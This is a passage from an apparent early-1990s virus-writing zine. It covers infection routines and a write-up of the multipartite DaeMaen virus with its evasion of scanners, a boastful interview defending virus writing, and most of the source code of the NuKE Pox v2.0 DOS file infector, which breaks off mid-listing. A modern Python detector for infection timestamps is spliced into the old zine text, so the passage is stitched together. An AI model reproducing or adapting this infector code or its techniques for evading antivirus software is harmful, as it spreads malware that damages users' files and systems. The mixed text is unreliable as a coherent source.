it'll keep re-hooking and fuck up the system. (You could do it with
flags, but I try and use as few flags as possible to keep code size down
to a minimum).

At boot-up, the program checks to see if it's already TSR (via an
illegal call to some interrupt, and checking the return code) and if it
isn't, it steals some memory (something F-Prot and friends can pick up,
but who gives a fuck, plus I can get around that now...<hehe>), hooks
int 13h with the int-check routine, hooks it again with our i13 handler,
then saves the current interrupt 21h vector. On every disk call, it
compares the value of i21 with the saved value... if it's different, the
int-check routine hooks it and then changes the vector that our int 13h
handler calls, so it no longer calls our int-check routine but goes
straight to the real i13.

That's the essentials of boot/file management. Anyhow, here's the code
to do what I just said, as it appears in the source code of D„eM†ˆn...

new13_2:        ; the guts of multipartite infection
                ; check to see if i21 has changed... if so, hook it
                call save               ; save registers
                push cs
                pop es
                xor ax, ax
                mov ds, ax
                mov si, 21h*4
                mov di, offset oldvect+8
                cld
                cmpsw
                je nochange
                cmpsw
                je nochange
                call capture_21
                push cs
                pop ds
                mov si, offset oldvect+0 ; copy over other ptr so
                lea di, [si+4]          ; that our i13 doesn't call
                movsw                   ; here any more [i21 has
                movsw                   ; been hooked]
nochange:       call restore            ; restore registers
                jmp dword ptr cs:[oldvect+0]


This method can be used on either floppy boot sector infection or the HD
partition table infection.

As with many of my routines, stuff which took many other virus writers a
few pages of code took me one page... that's not bad! I have many other
goodies up my sleeve, like a 387-byte generic COM/EXE parasitic infector
on execution, the smallest of its kind in the WORLD... (with room for
improvement!).

Anyway, next InfoJournal will include the source codes to two of my
prerelease Mutation Engines, both of which are fully functional in their
own right. They have evolved far beyond my dreams, and I hope to have
the world's best mutation engine finished by the end of February/March.
(but it can't be the best at everything, but it sure generates a bucket
fuckload of arcane bullshit instructions. Heuristical nightmare...)

Anyway, have fun screwing around with this little piece of research
material...

T„L”N/NuKE
===========================================================================
===========================================================================
D„eM†ˆn Virus
~~~~~~~~~~~~~

This virus took me a while to write (about two weeks), because I was
writing a lot of it for the first time. Some of the code is a bit
overboard, like I don't think the SYS entry has to be quite that complex
in order to work... but never mind. At least it works and it's quite
well-behaved.

This virus is my first boot/file virus, and that also works perfectly.
I worked all my own routines from scratch (my virus collection is
extremely small, and I don't want to be influenced by other
implementations unless they're better).

It infects both floppy boot sectors, moving the original boot sector to
the 5th last sector of the disk and writing the virus code on the last
four. It also infects the Master Boot Record (partition table) on the
first physical hard disk. Booting off an infected floppy will infect
the MBR, as will the execution of an infected file. However, trying to
read the partition table results in the redirection of the call,
resulting in the original partition table (prior to infection) being
read/written.

Floppies are infected on read/write access, and won't be infected if the
drive is still spinning (i.e. no disk change). It will take the boot
sector and use the BPB to calculate the last sectors of the disk, no
matter what format, be it 160k, 1.44meg, or even a 20meg floptical disk.
It makes sure it's a valid BPB by checking that the OEM name consists of
valid alphanumeric characters, but I was a bit selfish in that I overwrite
the last word of the OEM name to mark infection.

Files ending with the extensions .COM, .EXE, .BIN, .OVL and .SYS will be
infected on every possible file handle access I could find, i.e. they
will be infected on Open (3D), Close (3E), Attrib Change (43), Execution
(4B), Handle Rename/Move (56), and Extended Open (6C). It manages to
infect on file close by recording the filename when intercepting the
Create (3C) call, and the handle if it was created successfully.

If resident off an infected file, it will not hook int 13h directly,
instead searching segment 70h for DOS's call to the original interrupt
handler, then putting our address in there instead and using the old
address for our calls. It would have been possible to search the ROM
BIOS for the correct handler, but that would circumvent future
generations of boot/file viruses.

D„eM†ˆn employs a small decryption algorithm; however it is not variable
mutation, since a few registers have to be saved in order for the SYS
infection to work. The code is thoroughly encrypted, and McAfee and
friends will have to write a new disinfection engine for this baby.
However, disk infections are not encrypted, although it would have been
easily done.

The routine to load the virus off the disk has been altered to avoid
detection as Generic Boot Sector/Generic Partition virus. The changes
are trivial, and it makes it look as if I don't know what I'm doing.
The fact that I'm avoiding detection isn't readily apparent. Here is
a code comparison, take a look for yourself.

        Generic                         D„eM†ˆn
        mov si, 413h                    mov si, 412h
        sub word ptr [si], 3            add word ptr [si+1], -3   ; take 3k
        int 12h                         lodsb
                                        lodsw
        mov cl, 6                       mov cl, 6
        shl ax, cl                      shl ax, cl
        mov es, ax                      mov es, ax
        xor bx, bx                      xor bx, bx

The one on the left will be detected by SCAN, the one on the right will
not. The differences are trivial. SCAN is such a stupid program, it's
just ridiculous that millions of PC users rely on it utterly for total
virus protection. That's great...

D„eM†ˆn is partially selective in which files it infects. Firstly, it
will scan the filename for the characters SC, VS, CL and F-, which
excludes a lot of scanners (eg SCAN, TBSCAN etc), VSHIELD, CLEAN and
F-PROT.

Nor will it infect programs which have internal overlays. This is a
great advantage since people running WinDoze won't have their favourite
XYZ program fuck up because a virus infected it. D„eM†ˆn simply will
not infect programs with internal overlays. Here is the code to detect
them:

chkovl:         call file_end
                push ax                 ; check for internal overlays
                push dx
                mov ax, word ptr [page_cnt]
                mov cx, 512
                mul cx
                pop cx
                pop bp
                cmp ax, bp
                jb done
                cmp dx, cx
                jb done
                [...]
done:           ret

Pretty simple routine, huh?

The beauty of this beast is that one small mistake, like trying to boot
an infected disk by accident, or perhaps running an infected file, is
that next time you boot up your system, EVERY file in your CONFIG.SYS,
AUTOEXEC.BAT and everything henceforth will become infected! It is very
easy to expose a large number of files to the virus in a very short
space of time. Again, SCAN will probably help the spread of this virus
immensely, by stupid users scanning their HD habitually, with the virus
in memory... of course, EVERY file will then be infected.

As if that weren't enough for one virus, D„eM†ˆn will also hide the
increase of file size on the DOS directory. However, like most other
viruses which employ this stealth method, CHKDSK will not report any
allocation errors on these files. File size increase will be only 2048
bytes, or 4096 bytes for SYS files. It will account for the different
increase of the SYS.

To hide the increase, D„eM†ˆn employs a little-exploited method, which
is by adding 100 years to the date of the file. This way, other
over-exploited methods (like setting the seconds field to a certain
value) will not interfere with D„eM†ˆn's stealth operation, and
vice-versa.
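Both the 60-second infection marker that Npox checks in the disinfection article above and the 100-years date trick described here leave traces in the directory entry that a defender can look for. The following Python is an added example, not code from the journal or from either virus: it decodes DOS packed time and date words and flags impossible seconds values and implausibly future dates; the directory entries are constructed samples.

```python
"""Added example (not code from the zine or from either virus): a scanner
for the two directory-entry fingerprints described on this page.

  * Npox marks an infected file by setting the time stamp's seconds to 60.
    A DOS packed time stores seconds/2 in its low 5 bits, so legitimate
    values are 0..29 (0..58 s); 30 or 31 can never be produced by DOS.
  * DaeMaen hides its size increase by adding 100 years to the file date,
    so an otherwise valid entry carries a date decades in the future.

The directory entries below are constructed samples, not real files.
"""
from typing import Dict, List, Tuple

SECONDS_IMPOSSIBLE = 30          # field values 30/31 mean 60/62 seconds


def encode_dos_time(hours: int, minutes: int, seconds: int) -> int:
    """Pack a time the way FAT stores it: hhhhh mmmmmm sssss (seconds/2)."""
    return (hours << 11) | (minutes << 5) | (seconds // 2)


def encode_dos_date(year: int, month: int, day: int) -> int:
    """Pack a date the way FAT stores it: yyyyyyy mmmm ddddd (year-1980)."""
    return ((year - 1980) << 9) | (month << 5) | day


def decode_dos_time(word: int) -> Tuple[int, int, int]:
    return word >> 11, (word >> 5) & 0x3F, (word & 0x1F) * 2


def decode_dos_date(word: int) -> Tuple[int, int, int]:
    return 1980 + (word >> 9), (word >> 5) & 0x0F, word & 0x1F


def timestamp_findings(time_word: int, date_word: int, reference_year: int,
                       max_future_years: int = 10) -> List[str]:
    """Explain what is wrong with a packed (time, date) pair, if anything."""
    findings: List[str] = []
    hours, minutes, seconds = decode_dos_time(time_word)
    year, month, day = decode_dos_date(date_word)

    if (time_word & 0x1F) >= SECONDS_IMPOSSIBLE:
        findings.append(f"impossible seconds field ({seconds}s): "
                        "known infection marker (Npox-style)")
    if hours > 23 or minutes > 59:
        findings.append(f"invalid time {hours:02d}:{minutes:02d}")
    if not (1 <= month <= 12) or not (1 <= day <= 31):
        findings.append(f"invalid date fields month={month} day={day}")
    if year > reference_year + max_future_years:
        findings.append(f"date {year:04d}-{month:02d}-{day:02d} is "
                        f"{year - reference_year} years in the future: "
                        "possible +100-years stealth marker (DaeMaen-style)")
    return findings


def scan_entries(entries: List[Tuple[str, int, int]],
                 reference_year: int) -> Dict[str, List[str]]:
    """Return only the entries that have at least one finding."""
    report: Dict[str, List[str]] = {}
    for name, time_word, date_word in entries:
        found = timestamp_findings(time_word, date_word, reference_year)
        if found:
            report[name] = found
    return report


# Constructed directory entries: (name, packed time, packed date).
SAMPLE_ENTRIES = [
    ("COMMAND.COM", encode_dos_time(12, 0, 0),  encode_dos_date(1993, 3, 13)),
    ("EDIT.COM",    encode_dos_time(12, 0, 60), encode_dos_date(1993, 3, 13)),
    ("DRIVER.SYS",  encode_dos_time(12, 0, 0),  encode_dos_date(2093, 3, 13)),
    ("README.TXT",  encode_dos_time(9, 30, 14), encode_dos_date(1992, 11, 2)),
]

if __name__ == "__main__":
    for name, findings in scan_entries(SAMPLE_ENTRIES, 1993).items():
        for finding in findings:
            print(f"{name:12s} {finding}")
```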

D„eM†ˆn also includes a number of text strings:

"[D„eM†ˆn] by T„L”N-{N–Kä}" 25 bytes
"Hugs to Sara Gordon" 19 bytes
"Hey John! If this is bad, wait for [VCL20]!" 43 bytes
"For Dudley" 11 bytes
"[VCL20á]/T„L”N" 15 bytes
total 113 bytes

(That stuff about VCL20á is áogus, just to make McAsshole shit his
pants. But AV researchers be warned: a fair few of the routines
contained in D„eM†ˆn will also appear in VCL 2.0, like the boot/file
infect capability!)

Virus Length = 2048
Message Length = 113
...Code Length = 1935 bytes!!!

Totally unheard of!

I seriously doubt anybody can beat that, at least not for a while yet.

For a quick rehash of what this virus does...

COM/EXE/BIN/OVL/SYS/MBR/BS Parasitic Self-Encrypting Stealth virus, a
mere 2048 bytes long... but I can say Patricia Hoffman will totally fuck
up her description of this virus, she is so pathetically brain-dead.

Anyway, look out for a FULL STEALTH, WILDLY POLYMORPHIC COM/EXE/MBR
INFECTOR coming soon to a computer installation near you! From T„L”N of
course! And another one minus the polymorphism, under 800 bytes!

Have fun! And good night, John!

T„L”N/NuKE
===========================================================================
===========================================================================
Sunday Telegraph Interview
~~~~~~~~~~~~~~~~~~~~~~~~~~

Well, about a month ago a NuKE associate received a call from a female
reporter named Barbara Lewis; it was not our first, and surely not our
last. Nevertheless, the topic she raised was quite interesting! We have
the complete conversation between our NuKE member and Barbara Lewis.

For those that need more info, Barbara Lewis is an English reporter for
the _Sunday Telegraph_ in the United Kingdom. The article should
also be published in the _New York Times_, and I guess we will pin it up
with the others now. Anyhow the conversation...

Barbara> Beep-Bop-Beep-Dot-Beep-Beep-Bop. [Dials the number...]
Nuke > Hello?

Barbara> Yes, I'm looking for "Joseph Greco," as I am a reporter, Barbara
Lewis, for the _Sunday Telegraph_ in London. Is he there?
Nuke > This is he, how can I help you. [The old charms.]

Barbara> I am writing an article on virus groups and related underground
activities, I received this number from a friend telling me I
could get some information from you.
Nuke > What do you wish to know, and I will see if I can help you.

Barbara> I wish to know about the virus writers, why do they write such
programs? What do they find from these malicious programs?
Nuke > I believe you have the concept all messed up. Speaking on the
behalf of NuKE members we find that producing perhaps the
most technological advanced virus to exist, will if chance help
the AV (anti-virus) community to develop a standard or perhaps
a minimum of what their packages should do, as if it is capable
of the most advanced virus then getting the others is no problem.
Also, we see today that the anti-virus community are trying to
pull a suppression over all the computer users, and terrorize
them with this bad thing called a virus. Of course this method
is simply for the fact of increasing sales of their AV product,
which in turn is described to perform miracles when it comes
to virus protection. We have all heard about the well known
SCAN by McAfee, we have succeed in removing all their virus
strings and have found that there was only 850 of them, and
doesn't SCAN boast 1700+ viruses? Perhaps he has a copy of
every virus twice? Who knows!

Barbara> So you say that you are helping out the AV community?
Nuke > Well, not really, our basic idea is to help YOU, the average
computer user that is dumb on computer structures and uses
these software packages to only later find out he was raped,
raped out of his data and his money. I'll give you an example.
F-Prot is heard to be a great anti-viral kit, and that it can
stop many viruses at its tracks, unknown and known. Inside the
F-Prot kit there is a program called VIRSTOP, it is a TSR program
that will check every file you run for infection etc... Now who
would expect that VIRSTOP only detects 800 viruses, NOT MORE!
And the strings are cheap works that would lose all credit for
Frisk and his package if "word got out!" Lemme tell you, the
well-known encryption engines like MtE are NOT detected by
VIRSTOP! It is not a miss in code, Frisk NEVER put the damn
routine inside, it is incapable to detect any polymorphic virus
that has infected the system! You have just succeeded into
screwing yourself just as McAfee did with SCAN!
See, we are here to show you the facts, many people are not
able to disassemble and look through the code and find out what
the virus package can detect! So we bring this information out
to the public, all I say is TRUE and can be backed up with the
proof I found inside these AV programs!

Barbara> What about the virus writers wanting to cause damage?
Nuke > Again that is why we are here, if you produce you a virus that
is unbelievable, the advances in the scanners will increase by
learning from our viruses, and the chances of a 14-year-old
wanting to create a virus for revenge or whatever reason
cannot compete with this and their virus become a failure,
which is exactly what we want! And we too do not enjoy those
"kids" that enjoy damage, we run this organization legally and
seriously. If we do find such a user within our circle surely
he will be made an example of.

Barbara> There has been a group of teenagers in England that were virus
writers and called themselves ARCV, they have been arrested as
of Feb 8th, 1993 and are going on trail for creating viruses.
What do you think of this?
Nuke > Yes, ARCV, I knew them well. In this case I CANNOT say that I
am happy to see them arrested, you see many of there viruses
have been found and related to VCL/MPC generators. See, VCL is
a friendly user kit standing for Virus Creation Laboratory, all
one has to do is flag on the option he/she would want with his
dandy mouse and once done hit compile and the kit will produce
you the virus you asked it to do. Now are we going to put some-
one on trial for simply using such a program? Are we going to
introduce laws that make it illegal to run certain programs in
YOUR OWN computer? I find that a laugh! They certainly can not
be responsible!

Barbara> Then whom are we going to made responsible for these acts?
Nuke > Tough question, well I certainly do not believe that ARCV is.
I know several whom have used the VCL kit to generate viruses
to test how effective their anti-virus program was. This person
created the virus, in order to test them, should he be arrested
and tried? How do we know if a "bullet-proof" vest can withstand
a bullet? Naturally we test it! Also I find you are loosing
touch with the real issue! A virus is nothing but a program, it
can not be created by itself, it will do exactly what the
creator wanted it to do! Nothing more or less. ARCV's virus never
contain any DAMAGING CODE, they were viruses with little messages
and all... Wouldn't you say the guilty person is the one that
intensionally or carelessly created the virus for the produce to
cause havoc? The maker of a gun is not responsible for all the
murders but those that use it for that intension are.

Barbara> You seem to know a lot on what is happening on this topic, may I
ask to what organization you belong to?
Nuke > Sure, we called ourselves "NuKE" we are an international group,
ranging from Canada, USA, Australia, Europe. We are highly
organized, much more than what anybody would expect! We monitor
the virus and AV scene, not many would know it, but we do. We are
the makers of VCL which was the first of its kind, and STILL IS,
the ONLY virus kit to fully create your unique virus, many like
MPC consist on one virus which is broken up, we provide options as
adding you own feature or choose any 24 we have. We will be
releasing a VCL v2.0 to be again the FIRST of its kind surpassing
anything out there, it may "boggle" the world, but it will set
new standards and pave new methods of virus scanning, it will
unfortunately kill the little guys, by in this world you have to
be very competitive. The VCL kit will perhaps be marketed, if you
wish you may even buy an advance copy when it comes out within
a month!

Barbara> Sounds interesting, what is the price range?
Nuke > Humm...I guess 75$-100$ (US)

Barbara> I'll leave you my number, +44-XX-XXX-XXXX. Call me when this
program is available.
Nuke > K0ol...Will do... [Wow a date already?]

Barbara> I thank you for your time, and good day. [Mush]
Nuke > Okay now taw-taw... [English humour]

The NuKE Associates
===========================================================================
;==========================================================================
; ** NuKE Pox v2.0 **
;This is VERY old code but I promised to give it out, you'll see it exactly
;like Npox v1.1 in IJ#4, The code here is VERY BADLY written, I wrote WHOLE
;procedures TWICE! so LOTS of double code, I leave it UNTOUCHED for you to
;see, and understand it! I don't care if you fuck with it, go for it!
;The method of TSR is old, method of getting the Vectors is bad, the way
;I infect EXEs ain't too hot... But hell it works! It infects overlays..
;it won't infect F-prot.exe or anything with ????SCAN.EXE like SCAN.EXE or
;TBSCAN.EXE etc... Command.com dies fast... Really neat...Play all you like
;
;And to all those that said I `Hacked' this...
; FFFFFF UU UU CCCC KK KK YY YY OOOO UU UU
; FF UU UU CC CC KK KK YY YY OO OO UU UU
; FFFF UU UU CC KKK === YY OO OO UU UU
; FF UU UU CC CC KK KK YY OO OO UU UU
; FF UUUUUU CCCC KK KK YY OOOO UUUUUU
;Just cuz you can't do it, doesn't mean I can't, anyhow my 93 viruses are
;500% better than this one...
;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
;-* (c) Rock Steady, Viral Developments -*
;*- (c) NuKE Software Development 1991, 1992 *-
;-* -*
;*- Virus: NuKE PoX Version: 2.0 *-
;-* ~~~~~~ ~~~~~~~~ -*
;*- Notes: EXE & COM & OVL Infector, TSR Virus. Dir Stealth Routine. *-
;-* Will Disinfect files that are opened, and re-infect them -*
;*- when they are closed! Executed files are disinfected then *-
;-* executed, and when terminated reinfected! -*
;*- VERY HARD to stop, it goes for your COMMAND.COM! beware! *-
;-* It is listed as a COMMON Virus due to is stealthiness! -*
;*- Bytes: 1800 Bytes *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
virus_size equ last - init_virus ;Virus size
mut1 equ 3
mut2 equ 1
mut3 equ 103h ;Offset location

seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h ;COM file!
rocko proc far
start: jmp init_virus
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Virus Begins Here...
;-------------------------------------------------------------------------
init_virus: call doit_now ;Doit VirusMan...
doit_now: pop bp ;Not to Lose Track
sub bp,106h ;Set our position
push ax ;Save all the regesters
push bx
push cx
push dx
push si
push di
push bp
push es
push ds
mov ax,0abcdh ;Are we resident Already?
int 21h ;***McAfee Scan String!
cmp bx,0abcdh ;Yupe... Quit Then...
je exit_com
push cs ;Get CS=DS
pop ds
mov cx,es
mov ax,3521h ;Sometimes tend to inter-
int 21h ;cept this Interrupt...
mov word ptr cs:[int21+2][bp],es ;Save the Int
mov word ptr cs:[int21][bp],bx ;Vector Table
dec cx ;Get a new Memory block
mov es,cx ;Put it Back to ES
mov bx,es:mut1 ;Get TOM size
mov dx,virus_size ;Virus size in DX
mov cl,4 ;Shift 4 bits
shr dx,cl ;Fast way to divide by 16
add dx,4 ;add 1 more para segment
mov cx,es ;current MCB segment
sub bx,dx ;sub virus_size from TOM
inc cx ;put back right location
mov es,cx
mov ah,4ah ;Set_block
int 21h

jc exit_com
mov ah,48h ;now allocate it
dec dx ;number of para
mov bx,dx ;
int 21h
jc exit_com
dec ax ;get MCB
mov es,ax
mov cx,8h ;Made DOS the owner of MCB
mov es:mut2,cx ;put it...
sub ax,0fh ;get TOM
mov di,mut3 ;beginnig of our loc in mem
mov es,ax ;
mov si,bp ;delta pointer
add si,offset init_virus ;where to start
mov cx,virus_size
cld
repne movsb ;move us

mov ax,2521h ;Restore Int21 with ours
mov dx,offset int21_handler ;Where it starts
push es
pop ds
int 21h
exit_com: push cs
pop ds
cmp word ptr cs:[buffer][bp],5A4Dh
je exit_exe_file
mov bx,offset buffer ;Its a COM file restore
add bx,bp ;First three Bytes...
mov ax,[bx] ;Mov the Byte to AX
mov word ptr ds:[100h],ax ;First two bytes Restored
add bx,2 ;Get the next Byte
mov al,[bx] ;Move the Byte to AL
mov byte ptr ds:[102h],al ;Restore the Last of 3b
pop ds
pop es
pop bp ;Restore Regesters
pop di
pop si
pop dx
pop cx
pop bx
pop ax
mov ax,100h ;Jump Back to Beginning
push ax ;Restores our IP (a CALL
retn ;Saves them, now we changed
command db "C:\COMMAND.COM",0

exit_exe_file: mov bx,word ptr cs:[vir_cs][bp] ;fix segment loc
mov dx,cs ;
sub dx,bx
mov ax,dx
add ax,word ptr cs:[exe_cs][bp] ;add it to our segs
add dx,word ptr cs:[exe_ss][bp]
mov bx,word ptr cs:[exe_ip][bp]
mov word ptr cs:[fuck_yeah][bp],bx
mov word ptr cs:[fuck_yeah+2][bp],ax
mov ax,word ptr cs:[exe_ip][bp]
mov word ptr cs:[Rock_fix1][bp],dx
mov word ptr cs:[Rock_fix2][bp],ax
pop ds
pop es
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
db 0B8h ;nothing but MOV AX,XXXX
Rock_Fix1:
dw 0
cli
mov ss,ax
db 0BCh ;nothing but MOV SP,XXXX
Rock_Fix2:
dw 0
sti
db 0EAh ;nothing but JMP XXXX:XXXX
Fuck_yeah:
dd 0
int21 dd ? ;Our Old Int21
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Dir Handler
;-------------------------------------------------------------------------
old_dir: call calldos21 ;get FCB
test al,al ;error?
jnz old_out ;nope
push ax
push bx
push es
mov ah,51h ;get PSP
int 21h
mov es,bx ;
cmp bx,es:[16h] ;
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh
int 21h
pop ax
inc al ;Extended FCB?
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh
cmp al,1eh
jnz not_infected
and byte ptr es:[bx+17h],0e0h ;fix secs
sub word ptr es:[bx+1dh],virus_size
sbb word ptr es:[bx+1fh],0
not_infected: pop es
pop bx
pop ax
old_out: iret
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Int 21 Handler
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
int21_handler: cmp ah,11h
je old_dir
cmp ah,12h
je old_dir
cmp ax,4b00h ;File executed
je dis_infect
cmp ah,3dh
je check_file
cmp ah,3eh
je check_file2
cmp ax,0abcdh ;Virus testing
jne int21call
mov bx,0abcdh
int21call: jmp dword ptr cs:[int21] ;Split...

check_file: jmp opening_file ;Like a Charm
check_file2: jmp closing_file
dis_infect: call disinfect ;EXE & COM okay
dont_disinfect: push dx
pushf
push cs
call int21call
pop dx

execute: push ax
push bx
push cx
push dx
push ds

push ax
push bx
push cx
push dx
push ds
push bp
push cs
pop ds
mov dx,offset command
mov bp,0abcdh
jmp command1
command_ret: pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call check_4_av
jc exit1
command1: mov ax,4300h ;Get file Attribs
call calldos21
jc exit1
test cl,1h ;Make sure there normal
jz open_file ;Okay there are
and cl,0feh ;Nope, Fix them...
mov ax,4301h ;Save them now
call calldos21
jc exit
open_file: mov ax,3D02h
call calldos21
exit1: jc exit
mov bx,ax ;BX File handler
mov ax,5700h ;Get file TIME + DATE
Call calldos21
mov al,cl
or cl,1fh ;Un mask Seconds
dec cx ;60 seconds
xor al,cl ;Is it 60 seconds?
jz exit ;File already infected
push cs
pop ds
mov word ptr ds:[old_time],cx ;Save Time
mov word ptr ds:[old_date],dx ;Save Date
mov ah,3Fh
mov cx,1Bh ;Read first 1B
mov dx,offset ds:[buffer] ;into our Buffer
call calldos21
jc exit_now ;Error Split
mov ax,4202h ;Move file pointer
xor cx,cx ;to EOF File
xor dx,dx
call calldos21
jc exit_now ;Error Split
cmp word ptr ds:[buffer],5A4Dh ;Is file an EXE?
je exe_infect ;Infect EXE file
mov cx,ax
sub cx,3 ;Set the JMP
mov word ptr ds:[jump_address+1],cx
call infect_me ;Infect!
jc exit
mov ah,40h ;Write back the
mov dx,offset jump_address
mov cx,3h
call calldos21
exit_now:
mov cx,word ptr ds:[old_time] ;Restore old time
mov dx,word ptr ds:[old_date] ;Restore Old date
mov ax,5701h
call calldos21
mov ah,3Eh
call calldos21
exit: cmp bp,0abcdh
je command2
pop ds
pop dx
pop cx
pop bx
pop ax
iret
command2: jmp command_ret

exe_infect: mov cx,word ptr cs:[buffer+20]
mov word ptr cs:[exe_ip],cx
mov cx,word ptr cs:[buffer+22]
mov word ptr cs:[exe_cs],cx
mov cx,word ptr cs:[buffer+16]
mov word ptr cs:[exe_sp],cx
mov cx,word ptr cs:[buffer+14]
mov word ptr cs:[exe_ss],cx
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
mov word ptr cs:[vir_cs],dx
push ax
push dx
call infect_me
pop dx
pop ax
mov word ptr cs:[buffer+22],dx
mov word ptr cs:[buffer+20],ax
pop dx
pop ax
jc exit
add ax,virus_size
adc dx,0
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
add ax,40h
mov word ptr cs:[buffer+14],dx
mov word ptr cs:[buffer+16],ax
pop dx
pop ax
push bx
push cx
mov cl,7
shl dx,cl
mov bx,ax
mov cl,9
shr bx,cl
add dx,bx
and ax,1FFh
jz outta_here
inc dx
outta_here: pop cx
pop bx
mov word ptr cs:[buffer+2],ax
mov word ptr cs:[buffer+4],dx
mov ah,40h
mov dx,offset ds:[buffer]
mov cx,20h
call calldos21
exit_exe: jmp exit_now
rocko endp
vir_cs dw 0
exe_ip dw 0
exe_cs dw 0
exe_sp dw 0
exe_ss dw 0
exe_sz dw 0
exe_rm dw 0
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Opening File handle AX=3D
;-------------------------------------------------------------------------
opening_file: call check_extension
jnc open_fuck2
call check_exten_exe
jnc open_fuck2
jmp dword ptr cs:[int21]
open_fuck2: push ax
mov ax,3d02h
call calldos21
jnc open_fuck1
pop ax
iret
open_fuck1: push bx
push cx
push dx
push ds
mov bx,ax
mov ax,5700h
call calldos21
mov al,cl
or cl,1fh
dec cx ;60 Seconds
xor al,cl
jnz opening_exit3
dec cx
mov word ptr cs:[old_time],cx
mov word ptr cs:[old_date],dx
mov ax,4202h ;Yes Pointer to EOF
xor cx,cx
xor dx,dx
call calldos21
mov cx,dx
mov dx,ax
push cx
push dx
sub dx,1Bh ;Get first 3 Bytes
sbb cx,0
mov ax,4200h
call calldos21
push cs
pop ds
mov ah,3fh ;Read them into Buffer
mov cx,1Bh
mov dx,offset buffer
call calldos21
xor cx,cx ;Goto Beginning of File
xor dx,dx
mov ax,4200h
call calldos21
mov ah,40h ;Write first three bytes
mov dx,offset buffer
mov cx,1Bh
cmp word ptr cs:[buffer],5A4Dh
je open_exe_jmp
mov cx,3h
open_exe_jmp: call calldos21
pop dx ;EOF - Virus_Size
pop cx ;to get ORIGINAL File size
sub dx,virus_size
sbb cx,0
mov ax,4200h
call calldos21
mov ah,40h ;Fix Bytes
xor cx,cx
call calldos21
mov cx,word ptr cs:[old_time]
mov dx,word ptr cs:[old_date]
mov ax,5701h
int 21h
mov ah,3eh ;Close File
call calldos21
opening_exit3: pop ds
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[int21]
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Closing File Handle INFECT it!
;-------------------------------------------------------------------------
closing_file: cmp bx,0h
je closing_bye
cmp bx,5h
ja close_cont
closing_bye: jmp dword ptr cs:[int21]

close_cont: push ax
push bx
push cx
push dx
push di
push ds
push es
push bp
push bx
mov ax,1220h
int 2fh
mov ax,1216h
mov bl,es:[di]
int 2fh
pop bx
add di,0011h
mov byte ptr es:[di-0fh],02h
add di,0017h
cmp word ptr es:[di],'OC'
jne closing_next_try
cmp byte ptr es:[di+2h],'M'
jne pre_exit
jmp closing_cunt3
closing_next_try:
cmp word ptr es:[di],'XE'
jne pre_exit
cmp byte ptr es:[di+2h],'E'
jne pre_exit
closing_cunt: cmp word ptr es:[di-8],'CS'
jnz closing_cunt1 ;SCAN
cmp word ptr es:[di-6],'NA'
jz pre_exit
closing_cunt1: cmp word ptr es:[di-8],'-F'
jnz closing_cunt2 ;F-PROT
cmp word ptr es:[di-6],'RP'
jz pre_exit
closing_cunt2: cmp word ptr es:[di-8],'LC'
jnz closing_cunt3
cmp word ptr es:[di-6],'AE' ;CLEAN
jnz closing_cunt3
pre_exit: jmp closing_nogood
closing_cunt3: mov ax,5700h
call calldos21

mov al,cl
or cl,1fh
dec cx ;60 Seconds
xor al,cl
jz closing_nogood
push cs
pop ds
mov word ptr ds:[old_time],cx
mov word ptr ds:[old_date],dx
mov ax,4200h
xor cx,cx
xor dx,dx
call calldos21
mov ah,3fh
mov cx,1Bh
mov dx,offset buffer
call calldos21
jc closing_no_good
mov ax,4202h
xor cx,cx
xor dx,dx
call calldos21
jc closing_no_good
cmp word ptr ds:[buffer],5A4Dh
je closing_exe
mov cx,ax
sub cx,3h
mov word ptr ds:[jump_address+1],cx
call infect_me
jc closing_no_good
mov ah,40h
mov dx,offset jump_address
mov cx,3h
call calldos21
closing_no_good:
mov cx,word ptr ds:[old_time]
mov dx,word ptr ds:[old_date]
mov ax,5701h
call calldos21
closing_nogood: pop bp
pop es
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[int21]
closing_exe: mov cx,word ptr cs:[buffer+20]
mov word ptr cs:[exe_ip],cx
mov cx,word ptr cs:[buffer+22]
mov word ptr cs:[exe_cs],cx
mov cx,word ptr cs:[buffer+16]
mov word ptr cs:[exe_sp],cx
mov cx,word ptr cs:[buffer+14]
mov word ptr cs:[exe_ss],cx
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
mov word ptr cs:[vir_cs],dx
push ax
push dx
call infect_me
pop dx
pop ax
mov word ptr cs:[buffer+22],dx
mov word ptr cs:[buffer+20],ax
pop dx
pop ax
jc closing_no_good
add ax,virus_size
adc dx,0
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
add ax,40h
mov word ptr cs:[buffer+14],dx
mov word ptr cs:[buffer+16],ax
pop dx
pop ax
push bx
push cx
mov cl,7
shl dx,cl
mov bx,ax
mov cl,9
shr bx,cl
add dx,bx
and ax,1FFh
jz close_split
inc dx
close_split: pop cx
pop bx
mov word ptr cs:[buffer+2],ax
